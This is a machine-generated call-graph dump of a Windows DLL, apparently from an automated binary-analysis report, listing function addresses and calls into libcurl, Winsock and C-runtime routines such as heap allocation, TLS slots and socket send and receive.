21185->21188 21186->21177 21187->21188 21191 6b7aad42 21187->21191 21189 6b7aad6c 21188->21189 21195 6b7aade4 21188->21195 21189->21189 21192 6b7aad8f GetSystemDirectoryA 21189->21192 21189->21195 21190->21177 21191->21177 21193 6b7aad9d 21192->21193 21192->21195 21194 6b7aaded LoadLibraryA 21193->21194 21193->21195 21194->21195 21195->21177 18498 6b7d0ebd 18499 6b7d0efb 18498->18499 18503 6b7d0ecb __dosmaperr 18498->18503 18508 6b7c1f49 18499->18508 18501 6b7d0ee6 RtlAllocateHeap 18502 6b7d0ef9 18501->18502 18501->18503 18503->18499 18503->18501 18505 6b7d48a6 18503->18505 18511 6b7d48d3 18505->18511 18522 6b7cf692 GetLastError 18508->18522 18510 6b7c1f4e 18510->18502 18512 6b7d48df __fassign 18511->18512 18517 6b7d2dc8 EnterCriticalSection 18512->18517 18514 6b7d48ea 18518 6b7d4926 18514->18518 18517->18514 18521 6b7d2e10 LeaveCriticalSection 18518->18521 18520 6b7d48b1 18520->18503 18521->18520 18523 6b7cf6a9 18522->18523 18526 6b7cf6af 18522->18526 18557 6b7cfb50 18523->18557 18543 6b7cf6b5 SetLastError 18526->18543 18545 6b7cfb8f 18526->18545 18531 6b7cf6fc 18534 6b7cfb8f __dosmaperr 6 API calls 18531->18534 18532 6b7cf6e5 18533 6b7cfb8f __dosmaperr 6 API calls 18532->18533 18535 6b7cf6f3 18533->18535 18536 6b7cf708 18534->18536 18562 6b7cf7ea 18535->18562 18537 6b7cf70c 18536->18537 18538 6b7cf71d 18536->18538 18540 6b7cfb8f __dosmaperr 6 API calls 18537->18540 18568 6b7cf33d 18538->18568 18540->18535 18543->18510 18544 6b7cf7ea _free 12 API calls 18544->18543 18573 6b7cf953 18545->18573 18548 6b7cfbc9 TlsSetValue 18549 6b7cf6cd 18549->18543 18550 6b7cf78d 18549->18550 18555 6b7cf79a __dosmaperr 18550->18555 18551 6b7cf7da 18554 6b7c1f49 __dosmaperr 13 API calls 18551->18554 18552 6b7cf7c5 RtlAllocateHeap 18553 6b7cf6dd 18552->18553 18552->18555 18553->18531 18553->18532 18554->18553 18555->18551 18555->18552 18556 6b7d48a6 __dosmaperr 2 API calls 18555->18556 18556->18555 18558 6b7cf953 __dosmaperr 5 API calls 18557->18558 18559 6b7cfb6c 18558->18559 18560 6b7cfb87 TlsGetValue 18559->18560 18561 6b7cfb75 18559->18561 18561->18526 18563 6b7cf7f5 RtlFreeHeap 18562->18563 18564 6b7cf81e __dosmaperr 18562->18564 18563->18564 18565 6b7cf80a 18563->18565 18564->18543 18566 6b7c1f49 __dosmaperr 12 API calls 18565->18566 18567 6b7cf810 GetLastError 18566->18567 18567->18564 18587 6b7cf1d1 18568->18587 18574 6b7cf97d 18573->18574 18575 6b7cf981 18573->18575 18574->18548 18574->18549 18575->18574 18580 6b7cf88c 18575->18580 18578 6b7cf99b GetProcAddress 18578->18574 18579 6b7cf9ab __crt_fast_encode_pointer 18578->18579 18579->18574 18581 6b7cf89d __dosmaperr 18580->18581 18582 6b7cf8bb LoadLibraryExW 18581->18582 18584 6b7cf931 FreeLibrary 18581->18584 18585 6b7cf948 18581->18585 18586 6b7cf909 LoadLibraryExW 18581->18586 18582->18581 18583 6b7cf8d6 GetLastError 18582->18583 18583->18581 18584->18581 18585->18574 18585->18578 18586->18581 18588 6b7cf1dd __fassign 18587->18588 18601 6b7d2dc8 EnterCriticalSection 18588->18601 18590 6b7cf1e7 18602 6b7cf217 18590->18602 18593 6b7cf2e3 18594 6b7cf2ef __fassign 18593->18594 18606 6b7d2dc8 EnterCriticalSection 18594->18606 18596 6b7cf2f9 18607 6b7cf4c4 18596->18607 18598 6b7cf311 18611 6b7cf331 18598->18611 18601->18590 18605 6b7d2e10 LeaveCriticalSection 18602->18605 18604 6b7cf205 18604->18593 18605->18604 18606->18596 18608 6b7cf4fa __fassign 18607->18608 18609 6b7cf4d3 __fassign 18607->18609 18608->18598 18609->18608 18614 6b7d5193 18609->18614 18728 6b7d2e10 LeaveCriticalSection 18611->18728 18613 6b7cf31f 18613->18544 18616 6b7d5213 18614->18616 18617 6b7d51a9 18614->18617 18619 6b7cf7ea _free 14 API calls 18616->18619 18640 6b7d5261 18616->18640 18617->18616 18622 6b7d51dc 18617->18622 18625 6b7cf7ea _free 14 API calls 18617->18625 18618 6b7d526f 18629 6b7d52cf 18618->18629 18641 6b7cf7ea 14 API calls _free 18618->18641 18620 6b7d5235 18619->18620 18621 6b7cf7ea _free 14 API calls 18620->18621 18623 6b7d5248 18621->18623 18626 6b7cf7ea _free 14 API calls 18622->18626 18639 6b7d51fe 18622->18639 18627 6b7cf7ea _free 14 API calls 18623->18627 18624 6b7cf7ea _free 14 API calls 18628 6b7d5208 18624->18628 18630 6b7d51d1 18625->18630 18631 6b7d51f3 18626->18631 18632 6b7d5256 18627->18632 18633 6b7cf7ea _free 14 API calls 18628->18633 18634 6b7cf7ea _free 14 API calls 18629->18634 18642 6b7d5d4f 18630->18642 18670 6b7d5e4d 18631->18670 18637 6b7cf7ea _free 14 API calls 18632->18637 18633->18616 18638 6b7d52d5 18634->18638 18637->18640 18638->18608 18639->18624 18682 6b7d5304 18640->18682 18641->18618 18643 6b7d5d60 18642->18643 18669 6b7d5e49 18642->18669 18644 6b7d5d71 18643->18644 18645 6b7cf7ea _free 14 API calls 18643->18645 18646 6b7d5d83 18644->18646 18647 6b7cf7ea _free 14 API calls 18644->18647 18645->18644 18648 6b7cf7ea _free 14 API calls 18646->18648 18650 6b7d5d95 18646->18650 18647->18646 18648->18650 18649 6b7d5da7 18651 6b7d5db9 18649->18651 18653 6b7cf7ea _free 14 API calls 18649->18653 18650->18649 18652 6b7cf7ea _free 14 API calls 18650->18652 18654 6b7d5dcb 18651->18654 18655 6b7cf7ea _free 14 API calls 18651->18655 18652->18649 18653->18651 18655->18654 18669->18622 18671 6b7d5e5a 18670->18671 18672 6b7d5eb2 18670->18672 18673 6b7d5e6a 18671->18673 18674 6b7cf7ea _free 14 API calls 18671->18674 18672->18639 18675 6b7d5e7c 18673->18675 18676 6b7cf7ea _free 14 API calls 18673->18676 18674->18673 18677 6b7d5e8e 18675->18677 18678 6b7cf7ea _free 14 API calls 18675->18678 18676->18675 18679 6b7d5ea0 18677->18679 18680 6b7cf7ea _free 14 API calls 18677->18680 18678->18677 18679->18672 18681 6b7cf7ea _free 14 API calls 18679->18681 18680->18679 18681->18672 18683 6b7d5311 18682->18683 18684 6b7d5330 18682->18684 18683->18684 18688 6b7d5eee 18683->18688 18684->18618 18687 6b7cf7ea _free 14 API calls 18687->18684 18689 6b7d532a 18688->18689 18690 6b7d5eff 18688->18690 18689->18687 18724 6b7d5eb6 18690->18724 18693 6b7d5eb6 __fassign 14 API calls 18694 6b7d5f12 18693->18694 18695 6b7d5eb6 __fassign 14 API calls 18694->18695 18725 6b7d5ee9 18724->18725 18726 6b7d5ed9 18724->18726 18725->18693 18726->18725 18727 6b7cf7ea _free 14 API calls 18726->18727 18727->18726 18728->18613 19123 6b779e30 19124 6b779e46 curl_multi_setopt curl_multi_add_handle 19123->19124 19126 6b779ef1 19124->19126 19127 6b779ef7 curl_multi_poll 19126->19127 19128 6b779f50 curl_multi_remove_handle 19126->19128 19127->19128 19129 6b779f11 curl_multi_perform 19127->19129 19129->19128 20451 6b772d20 20452 6b772d80 20451->20452 20453 6b772d6a 20451->20453 20454 6b7ae5d0 2 API calls 20452->20454 20455 6b7bdb71 __fassign 5 API calls 20453->20455 20457 6b772d8c 20454->20457 20456 6b772d7c 20455->20456 20458 6b7732c4 20457->20458 20461 6b772e4c 20457->20461 20459 6b7a05d0 74 API calls 20458->20459 20460 6b7732cf 20459->20460 20463 6b7bdb71 __fassign 5 API calls 20460->20463 20462 6b772e55 20461->20462 20470 6b772e9a __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 20461->20470 20464 6b773f40 204 API calls 20462->20464 20465 6b7732e4 20463->20465 20466 6b772e68 20464->20466 20468 6b772e84 20466->20468 20471 6b774060 92 API calls 20466->20471 20469 6b7bdb71 __fassign 5 API calls 20468->20469 20472 6b772e96 20469->20472 20474 6b773130 20470->20474 20476 6b774740 SleepEx getsockopt WSAGetLastError 20470->20476 20480 6b773185 20470->20480 20481 6b7a06b0 74 API calls 20470->20481 20482 6b773025 WSASetLastError 20470->20482 20486 6b788450 21 API calls 20470->20486 20491 6b7aa0e0 53 API calls 20470->20491 20493 6b7746a0 207 API calls 20470->20493 20503 6b7a03a0 20470->20503 20471->20468 20473 6b7732af 20475 6b7bdb71 __fassign 5 API calls 20473->20475 20474->20473 20535 6b7746a0 20474->20535 20478 6b7732c0 20475->20478 20476->20470 20483 6b7728e0 closesocket 20480->20483 20487 6b7731dd 20480->20487 20481->20470 20482->20470 20483->20487 20485 6b77316d 20489 6b7aa0e0 53 API calls 20485->20489 20486->20470 20515 6b773f40 20487->20515 20488 6b7731f9 20488->20460 20492 6b77320c 20488->20492 20490 6b77326a 20489->20490 20494 6b7a05d0 74 API calls 20490->20494 20491->20470 20527 6b774060 20492->20527 20493->20470 20497 6b773288 20494->20497 20497->20473 20499 6b773297 20497->20499 20498 6b7bdb71 __fassign 5 API calls 20500 6b773226 20498->20500 20501 6b7bdb71 __fassign 5 API calls 20499->20501 20502 6b7732ab 20501->20502 20504 6b7a03c0 20503->20504 20506 6b7a03e7 20503->20506 20505 6b7a03c9 20504->20505 20504->20506 20574 6b7a04d0 20505->20574 20541 6b79fef0 20506->20541 20509 6b7a03d4 20510 6b7bdb71 __fassign 5 API calls 20509->20510 20511 6b7a03e3 20510->20511 20511->20470 20512 6b7bdb71 __fassign 5 API calls 20513 6b7a04c0 20512->20513 20513->20470 20514 6b7a0431 20514->20512 20516 6b77403b 20515->20516 20517 6b773f54 20515->20517 20516->20488 20518 6b774023 20517->20518 20519 6b773fcd 20517->20519 20520 6b7a05d0 74 API calls 20518->20520 20521 6b773fd4 20519->20521 20522 6b773ff1 20519->20522 20523 6b77402f 20520->20523 20580 6b7a75d0 20521->20580 20780 6b7a6f40 20522->20780 20523->20488 20526 6b773fec 20526->20488 20528 6b77408d 20527->20528 20529 6b774080 20527->20529 21072 6b7736a0 20528->21072 21122 6b79cc20 20529->21122 20532 6b77409d 21125 6b7828a0 20532->21125 20536 6b774719 20535->20536 20537 6b7746cc 20535->20537 20538 6b773160 20536->20538 20539 6b7728e0 closesocket 20536->20539 20537->20536 20540 6b7740c0 207 API calls 20537->20540 20538->20453 20538->20485 20539->20538 20540->20537 20542 6b79ff10 20541->20542 20547 6b79ff2b 20541->20547 20542->20547 20554 6b79ff69 20542->20554 20543 6b7a0384 20545 6b7bdb71 __fassign 5 API calls 20543->20545 20544 6b7a0369 20548 6b7a037d Sleep 20544->20548 20549 6b7a0390 20545->20549 20546 6b79ff4d WSASetLastError 20551 6b7bdb71 __fassign 5 API calls 20546->20551 20547->20543 20547->20544 20547->20546 20550 6b7a0363 20547->20550 20548->20543 20549->20514 20550->20544 20550->20548 20552 6b79ff65 20551->20552 20552->20514 20553 6b7a00d9 20561 6b7a00e9 20553->20561 20566 6b7a0164 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 20553->20566 20554->20553 20555 6b7a0100 WSASetLastError 20554->20555 20556 6b7a010e 20555->20556 20557 6b7bdb71 __fassign 5 API calls 20556->20557 20558 6b7a011b 20557->20558 20558->20514 20559 6b7a0237 select 20560 6b7a00fb 20559->20560 20560->20556 20573 6b7a027f 20560->20573 20561->20560 20562 6b7a0142 20561->20562 20563 6b7a0129 WSASetLastError 20561->20563 20565 6b7a013c 20561->20565 20564 6b7a0156 Sleep 20562->20564 20563->20560 20564->20560 20565->20562 20565->20564 20566->20559 20567 6b7a02a1 __WSAFDIsSet 20569 6b7a02df __WSAFDIsSet 20567->20569 20567->20573 20568 6b7a0350 20570 6b7bdb71 __fassign 5 API calls 20568->20570 20571 6b7a02fc __WSAFDIsSet 20569->20571 20569->20573 20572 6b7a035f 20570->20572 20571->20573 20572->20514 20573->20567 20573->20568 20573->20569 20573->20571 20575 6b7a04df 20574->20575 20576 6b7a0517 20574->20576 20577 6b7a04f9 Sleep 20575->20577 20578 6b7a04e9 WSASetLastError 20575->20578 20576->20509 20577->20576 20578->20509 20581 6b7a7642 __fassign 20580->20581 20582 6b7a824c 20581->20582 20584 6b7a780d 20581->20584 20585 6b7a76dc 20581->20585 20586 6b7a7885 20581->20586 20583 6b7a06b0 74 API calls 20582->20583 20587 6b7a8264 20583->20587 20606 6b7a78e8 20584->20606 20893 6b7a07e0 recv 20584->20893 20590 6b7a76f8 20585->20590 20591 6b7a06b0 74 API calls 20585->20591 20588 6b7a0c20 94 API calls 20586->20588 20595 6b7bdb71 __fassign 5 API calls 20587->20595 20593 6b7a78a4 20588->20593 20592 6b7a771e 20590->20592 20603 6b7a06b0 74 API calls 20590->20603 20591->20590 20596 6b7a7743 20592->20596 20604 6b7a06b0 74 API calls 20592->20604 20593->20584 20605 6b7a78b0 20593->20605 20594 6b7a7847 20597 6b7a7858 20594->20597 20598 6b7a7909 20594->20598 20602 6b7a827f 20595->20602 20890 6b7a0c20 20596->20890 20599 6b7a7931 20597->20599 20600 6b7a7861 20597->20600 20598->20599 20601 6b7a790d 20598->20601 20599->20606 20615 6b7a7940 20599->20615 20616 6b7a7964 20599->20616 20608 6b7a05d0 74 API calls 20600->20608 20609 6b7a05d0 74 API calls 20601->20609 20602->20526 20603->20592 20604->20596 20610 6b7a05d0 74 API calls 20605->20610 20607 6b7bdb71 __fassign 5 API calls 20606->20607 20612 6b7a7905 20607->20612 20613 6b7a786c 20608->20613 20614 6b7a7918 20609->20614 20617 6b7a78bb 20610->20617 20612->20526 20620 6b7bdb71 __fassign 5 API calls 20613->20620 20621 6b7bdb71 __fassign 5 API calls 20614->20621 20622 6b7a05d0 74 API calls 20615->20622 20618 6b7a7c99 20616->20618 20624 6b7a79de 20616->20624 20651 6b7a7973 20616->20651 20623 6b7bdb71 __fassign 5 API calls 20617->20623 20634 6b7a7cb4 20618->20634 20654 6b7a7f30 __fassign 20618->20654 20626 6b7a7881 20620->20626 20627 6b7a792d 20621->20627 20628 6b7a794b 20622->20628 20629 6b7a78d0 20623->20629 20631 6b7a79e2 20624->20631 20632 6b7a7a53 20624->20632 20625 6b7a77ca 20625->20584 20630 6b7a77dd 20625->20630 20626->20526 20627->20526 20633 6b7bdb71 __fassign 5 API calls 20628->20633 20629->20526 20644 6b7bdb71 __fassign 5 API calls 20630->20644 20636 6b7a79eb 20631->20636 20637 6b7a7a2f 20631->20637 20638 6b7a7a7b 20632->20638 20639 6b7a7a57 20632->20639 20640 6b7a7960 20633->20640 20635 6b7884a0 166 API calls 20634->20635 20641 6b7a7ccc 20635->20641 20896 6b7a8400 20636->20896 20645 6b7a05d0 74 API calls 20637->20645 20642 6b7a05d0 74 API calls 20638->20642 20646 6b7a05d0 74 API calls 20639->20646 20640->20526 20648 6b7a7cd8 20641->20648 20649 6b7a7e6d 20641->20649 20650 6b7a7a86 20642->20650 20643 6b7a802e 20647 6b7a05d0 74 API calls 20643->20647 20652 6b7a7809 20644->20652 20653 6b7a7a3a 20645->20653 20655 6b7a7a62 20646->20655 20657 6b7a8039 20647->20657 20658 6b7a7d03 20648->20658 20659 6b7a7ce0 20648->20659 20665 6b7bdb71 __fassign 5 API calls 20649->20665 20660 6b7bdb71 __fassign 5 API calls 20650->20660 20672 6b7a7ac3 20651->20672 20673 6b7a7ae7 __fassign 20651->20673 20652->20526 20666 6b7bdb71 __fassign 5 API calls 20653->20666 20661 6b7a06b0 74 API calls 20654->20661 20754 6b7a7dde 20654->20754 20667 6b7bdb71 __fassign 5 API calls 20655->20667 20669 6b7bdb71 __fassign 5 API calls 20657->20669 20681 6b7a7f00 20658->20681 20689 6b7a7d2d 20658->20689 20659->20587 20670 6b7a7ce9 20659->20670 20671 6b7a7a9b 20660->20671 20661->20754 20662 6b7a7a04 20662->20638 20674 6b7a7a0b 20662->20674 20663 6b7a7b47 __fassign 20678 6b7a0c20 94 API calls 20663->20678 20664 6b7a0c20 94 API calls 20675 6b7a7fe1 20664->20675 20676 6b7a7e7f 20665->20676 20677 6b7a7a4f 20666->20677 20668 6b7a7a77 20667->20668 20668->20526 20679 6b7a804e 20669->20679 20680 6b7bdb71 __fassign 5 API calls 20670->20680 20671->20526 20682 6b7a05d0 74 API calls 20672->20682 20673->20663 20684 6b7a7b23 20673->20684 20683 6b7a05d0 74 API calls 20674->20683 20685 6b7a8011 20675->20685 20693 6b7a7fed 20675->20693 20676->20526 20677->20526 20686 6b7a7b9b 20678->20686 20679->20526 20687 6b7a7cff 20680->20687 20688 6b7a05d0 74 API calls 20681->20688 20690 6b7a7ace 20682->20690 20691 6b7a7a16 20683->20691 20692 6b7a05d0 74 API calls 20684->20692 20685->20606 20685->20643 20701 6b7a8052 20685->20701 20694 6b7a7bcb 20686->20694 20702 6b7a7ba7 20686->20702 20687->20526 20695 6b7a7f11 20688->20695 20696 6b788450 21 API calls 20689->20696 20697 6b7bdb71 __fassign 5 API calls 20690->20697 20698 6b7bdb71 __fassign 5 API calls 20691->20698 20699 6b7a7b2e 20692->20699 20700 6b7a05d0 74 API calls 20693->20700 20694->20606 20716 6b7a07e0 2 API calls 20694->20716 20703 6b7bdb71 __fassign 5 API calls 20695->20703 20704 6b7a7d3f curl_msnprintf 20696->20704 20705 6b7a7ae3 20697->20705 20706 6b7a7a2b 20698->20706 20707 6b7bdb71 __fassign 5 API calls 20699->20707 20708 6b7a7ff8 20700->20708 20710 6b7a07e0 2 API calls 20701->20710 20709 6b7a05d0 74 API calls 20702->20709 20711 6b7a7f26 20703->20711 20722 6b7a7d9f 20704->20722 20723 6b7a7e83 20704->20723 20705->20526 20706->20526 20712 6b7a7b43 20707->20712 20713 6b7bdb71 __fassign 5 API calls 20708->20713 20714 6b7a7bb2 20709->20714 20715 6b7a808d 20710->20715 20711->20526 20712->20526 20718 6b7a800d 20713->20718 20719 6b7bdb71 __fassign 5 API calls 20714->20719 20720 6b7a80c3 20715->20720 20725 6b7a809f 20715->20725 20721 6b7a7c1a 20716->20721 20718->20526 20724 6b7a7bc7 20719->20724 20720->20606 20727 6b7a821a 20720->20727 20737 6b7a80de 20720->20737 20738 6b7a8102 20720->20738 20726 6b7a7c50 20721->20726 20733 6b7a7c2c 20721->20733 20728 6b7a06b0 74 API calls 20722->20728 20729 6b7a7e88 20723->20729 20730 6b7a7ed7 20723->20730 20724->20526 20732 6b7a05d0 74 API calls 20725->20732 20726->20606 20726->20618 20726->20727 20743 6b7a7c6d 20726->20743 20734 6b7a05d0 74 API calls 20727->20734 20728->20754 20747 6b7a06b0 74 API calls 20729->20747 20731 6b7a05d0 74 API calls 20730->20731 20731->20754 20735 6b7a80aa 20732->20735 20736 6b7a05d0 74 API calls 20733->20736 20739 6b7a8225 20734->20739 20740 6b7bdb71 __fassign 5 API calls 20735->20740 20741 6b7a7c37 20736->20741 20742 6b7a05d0 74 API calls 20737->20742 20744 6b7a8109 20738->20744 20745 6b7a8145 20738->20745 20746 6b7bdb71 __fassign 5 API calls 20739->20746 20748 6b7a80bf 20740->20748 20749 6b7bdb71 __fassign 5 API calls 20741->20749 20750 6b7a80e9 20742->20750 20751 6b7a05d0 74 API calls 20743->20751 20752 6b7a05d0 74 API calls 20744->20752 20759 6b7a81f2 20745->20759 20762 6b7a814c 20745->20762 20753 6b7a823a 20746->20753 20747->20754 20748->20526 20755 6b7a7c4c 20749->20755 20756 6b7bdb71 __fassign 5 API calls 20750->20756 20757 6b7a7c80 20751->20757 20758 6b7a8123 20752->20758 20753->20526 20754->20643 20754->20664 20755->20526 20760 6b7a80fe 20756->20760 20761 6b7bdb71 __fassign 5 API calls 20757->20761 20766 6b7bdb71 __fassign 5 API calls 20758->20766 20764 6b7a05d0 74 API calls 20759->20764 20760->20526 20765 6b7a7c95 20761->20765 20762->20582 20763 6b7a07e0 2 API calls 20762->20763 20767 6b7a81bc 20763->20767 20768 6b7a81fd 20764->20768 20765->20526 20769 6b7a8141 20766->20769 20770 6b7a81c9 20767->20770 20771 6b7a8216 20767->20771 20772 6b7bdb71 __fassign 5 API calls 20768->20772 20769->20526 20773 6b7a823e 20770->20773 20774 6b7a81ce 20770->20774 20771->20727 20771->20773 20775 6b7a8212 20772->20775 20773->20582 20773->20606 20776 6b7a05d0 74 API calls 20774->20776 20775->20526 20777 6b7a81d9 20776->20777 20778 6b7bdb71 __fassign 5 API calls 20777->20778 20779 6b7a81ee 20778->20779 20779->20526 20781 6b7a6f92 20780->20781 20784 6b7a71fa 20781->20784 20785 6b7a6fce 20781->20785 20786 6b7a70ed 20781->20786 20798 6b7a708d 20781->20798 20821 6b7a7319 20781->20821 20827 6b7a7277 20781->20827 20847 6b7a73ec 20781->20847 20782 6b7a7403 20787 6b7a05d0 74 API calls 20782->20787 20783 6b7a7427 20788 6b7a7547 20783->20788 20789 6b7a7437 20783->20789 20790 6b7a05d0 74 API calls 20784->20790 20793 6b7a7001 20785->20793 20807 6b7a06b0 74 API calls 20785->20807 21068 6b787d40 20786->21068 20797 6b7a740e 20787->20797 20805 6b7a05d0 74 API calls 20788->20805 20799 6b7a74b9 20789->20799 20800 6b7a743e 20789->20800 20801 6b7a7472 20789->20801 20802 6b7a7500 20789->20802 20803 6b7a7208 20790->20803 20791 6b7a0c20 94 API calls 20804 6b7a72c5 20791->20804 20796 6b7a06b0 74 API calls 20793->20796 20794 6b7a07e0 2 API calls 20795 6b7a737c 20794->20795 20813 6b7a73b6 20795->20813 20814 6b7a7386 20795->20814 20830 6b7a7015 20796->20830 20808 6b7bdb71 __fassign 5 API calls 20797->20808 20798->20798 20819 6b7a70c9 20798->20819 20826 6b7a7221 __fassign 20798->20826 20815 6b7a05d0 74 API calls 20799->20815 20809 6b7a06b0 74 API calls 20800->20809 20811 6b7a05d0 74 API calls 20801->20811 20816 6b7a05d0 74 API calls 20802->20816 20810 6b7bdb71 __fassign 5 API calls 20803->20810 20804->20821 20835 6b7a72d1 20804->20835 20817 6b7a7575 20805->20817 20806 6b7a70fc 20812 6b7a710a 20806->20812 20834 6b7a7195 20806->20834 20807->20793 20818 6b7a7423 20808->20818 20822 6b7a7456 20809->20822 20823 6b7a721d 20810->20823 20824 6b7a74a0 20811->20824 20825 6b7a06b0 74 API calls 20812->20825 20829 6b7a73de 20813->20829 20832 6b7a73ba 20813->20832 20828 6b7a738b curl_easy_strerror 20814->20828 20814->20829 20831 6b7a74e7 20815->20831 20833 6b7a752e 20816->20833 20836 6b7bdb71 __fassign 5 API calls 20817->20836 20818->20526 20838 6b7a05d0 74 API calls 20819->20838 20820 6b7a7326 20839 6b7bdb71 __fassign 5 API calls 20820->20839 20821->20794 20821->20820 20840 6b7bdb71 __fassign 5 API calls 20822->20840 20823->20526 20841 6b7bdb71 __fassign 5 API calls 20824->20841 20860 6b7a7085 20825->20860 20826->20827 20863 6b7a72f5 20826->20863 20827->20791 20842 6b7a05d0 74 API calls 20828->20842 20829->20820 20829->20847 20830->20798 20843 6b7884a0 166 API calls 20830->20843 20844 6b7bdb71 __fassign 5 API calls 20831->20844 20845 6b7a05d0 74 API calls 20832->20845 20846 6b7bdb71 __fassign 5 API calls 20833->20846 20859 6b7a71ad 20834->20859 20834->20860 20848 6b7a05d0 74 API calls 20835->20848 20837 6b7a758a 20836->20837 20837->20526 20850 6b7a70d4 20838->20850 20851 6b7a7343 20839->20851 20852 6b7a746e 20840->20852 20853 6b7a74b5 20841->20853 20854 6b7a739d 20842->20854 20855 6b7a7041 20843->20855 20856 6b7a74fc 20844->20856 20857 6b7a73c5 20845->20857 20858 6b7a7543 20846->20858 20847->20782 20847->20783 20849 6b7a72dc 20848->20849 20861 6b7bdb71 __fassign 5 API calls 20849->20861 20862 6b7bdb71 __fassign 5 API calls 20850->20862 20851->20526 20852->20526 20853->20526 20864 6b7bdb71 __fassign 5 API calls 20854->20864 20865 6b7a704d 20855->20865 20866 6b7a71b5 20855->20866 20856->20526 20867 6b7bdb71 __fassign 5 API calls 20857->20867 20858->20526 20859->20866 20868 6b7a706f 20859->20868 20860->20784 20874 6b788450 21 API calls 20860->20874 20870 6b7a72f1 20861->20870 20872 6b7a70e9 20862->20872 20871 6b7a05d0 74 API calls 20863->20871 20873 6b7a73b2 20864->20873 20865->20860 20875 6b7a7055 20865->20875 20869 6b7bdb71 __fassign 5 API calls 20866->20869 20876 6b7a73da 20867->20876 20877 6b7bdb71 __fassign 5 API calls 20868->20877 20878 6b7a71c7 20869->20878 20870->20526 20879 6b7a7300 20871->20879 20872->20526 20873->20526 20880 6b7a7159 20874->20880 20885 6b7a06b0 74 API calls 20875->20885 20876->20526 20881 6b7a7081 20877->20881 20878->20526 20882 6b7bdb71 __fassign 5 API calls 20879->20882 20883 6b7a71cb 20880->20883 20884 6b7a7165 20880->20884 20881->20526 20887 6b7a7315 20882->20887 20886 6b7a05d0 74 API calls 20883->20886 20888 6b7a06b0 74 API calls 20884->20888 20885->20868 20889 6b7a7193 20886->20889 20887->20526 20888->20889 20889->20784 20889->20798 21001 6b7a09f0 20890->21001 20892 6b7a0c45 20892->20605 20892->20625 20894 6b7a07fb WSAGetLastError 20893->20894 20895 6b7a081e 20893->20895 20894->20594 20895->20594 20897 6b7a8456 ___from_strstr_to_strchr 20896->20897 20898 6b7a8478 20897->20898 20901 6b7a84ab 20897->20901 20899 6b7a8524 20898->20899 20900 6b7a8495 20898->20900 21024 6b7a9190 20899->21024 20902 6b7bdb71 __fassign 5 API calls 20900->20902 20906 6b7a84f8 curl_msnprintf 20901->20906 20934 6b7a8988 20901->20934 20903 6b7a84a7 20902->20903 20903->20662 20904 6b7bdb71 __fassign 5 API calls 20907 6b7a89cb 20904->20907 20906->20899 20907->20662 20908 6b7a8609 20909 6b7a863e 20908->20909 20910 6b7a8610 20908->20910 21036 6b79a660 ioctlsocket 20909->21036 20912 6b7a05d0 74 API calls 20910->20912 20996 6b7a861b 20912->20996 20913 6b7a86ea htons 20915 6b7a0c20 94 API calls 20913->20915 20914 6b7bdb71 __fassign 5 API calls 20916 6b7a9184 20914->20916 20935 6b7a8646 20915->20935 20916->20662 20917 6b7a8890 21037 6b7a9a80 GetLastError 20917->21037 20918 6b7a890d 20922 6b7a05d0 74 API calls 20918->20922 20921 6b7a8330 20 API calls 20921->20935 20922->20996 20924 6b7a0c20 94 API calls 20924->20935 20925 6b7a8a1d 20926 6b7a05d0 74 API calls 20925->20926 20926->20996 20927 6b7a89cf 20930 6b7a05d0 74 API calls 20927->20930 20928 6b7a8820 htons 20928->20935 20929 6b7a8a4b 20931 6b7a9190 82 API calls 20929->20931 20930->20996 20932 6b7a8a94 20931->20932 20936 6b7a8a9b 20932->20936 20937 6b7a8acf 20932->20937 20934->20904 20935->20913 20935->20917 20935->20918 20935->20921 20935->20924 20935->20925 20935->20927 20935->20928 20935->20929 20935->20934 20940 6b7a896c 20935->20940 20942 6b7a05d0 74 API calls 20936->20942 20938 6b7a06b0 74 API calls 20937->20938 20943 6b7a8ae0 20938->20943 20941 6b7a05d0 74 API calls 20940->20941 20941->20996 20942->20996 20944 6b7a06b0 74 API calls 20943->20944 20996->20914 21002 6b7a0b1a send 21001->21002 21003 6b7a0a54 21001->21003 21004 6b7a0b3e WSAGetLastError 21002->21004 21015 6b7a0b8e 21002->21015 21003->21002 21008 6b7a03a0 16 API calls 21003->21008 21005 6b7a0b69 21004->21005 21006 6b7a0b4e 21004->21006 21010 6b7aa0e0 53 API calls 21005->21010 21009 6b7bdb71 __fassign 5 API calls 21006->21009 21007 6b7bdb71 __fassign 5 API calls 21011 6b7a0bb4 21007->21011 21017 6b7a0a85 21008->21017 21012 6b7a0b65 21009->21012 21013 6b7a0b7b 21010->21013 21011->20892 21012->20892 21014 6b7a05d0 74 API calls 21013->21014 21014->21015 21015->21007 21016 6b7a0abe 21018 6b7a0b13 21016->21018 21019 6b7a0af5 recv 21016->21019 21017->21002 21017->21016 21021 6b7a0ad1 21017->21021 21018->21002 21019->21002 21020 6b7a0b0e 21019->21020 21020->21002 21022 6b7bdb71 __fassign 5 API calls 21021->21022 21023 6b7a0ae7 21022->21023 21023->20892 21025 6b7a91ff 21024->21025 21026 6b7a91b2 21024->21026 21027 6b7bdb71 __fassign 5 API calls 21025->21027 21026->21025 21029 6b7a91c7 21026->21029 21028 6b7a920d 21027->21028 21028->20908 21030 6b7a9a80 55 API calls 21029->21030 21031 6b7a91d9 21030->21031 21032 6b7a05d0 74 API calls 21031->21032 21033 6b7a91e7 21032->21033 21034 6b7bdb71 __fassign 5 API calls 21033->21034 21035 6b7a91fb 21034->21035 21035->20908 21036->20935 21038 6b7c1f49 __dosmaperr 14 API calls 21037->21038 21039 6b7a9ab0 21038->21039 21040 6b7a9abc 21039->21040 21045 6b7a9acf 21039->21045 21041 6b7bdb71 __fassign 5 API calls 21040->21041 21043 6b7a9acb 21041->21043 21042 6b7a9db6 21044 6b7a9dbb curl_msnprintf 21042->21044 21046 6b7aa770 49 API calls 21044->21046 21045->21042 21045->21044 21048 6b7a9e87 curl_msnprintf 21045->21048 21049 6b7a9e99 _strncpy 21048->21049 21069 6b787d53 21068->21069 21070 6b788840 77 API calls 21069->21070 21071 6b787d6c 21070->21071 21071->20806 21073 6b7738bf 21072->21073 21074 6b7736c6 21072->21074 21075 6b7bdb71 __fassign 5 API calls 21073->21075 21074->21073 21076 6b7736e0 getpeername 21074->21076 21077 6b773999 21075->21077 21078 6b773743 __fassign 21076->21078 21079 6b773708 WSAGetLastError 21076->21079 21077->20532 21082 6b773760 getsockname 21078->21082 21080 6b7aa0e0 53 API calls 21079->21080 21081 6b773722 21080->21081 21083 6b7a05d0 74 API calls 21081->21083 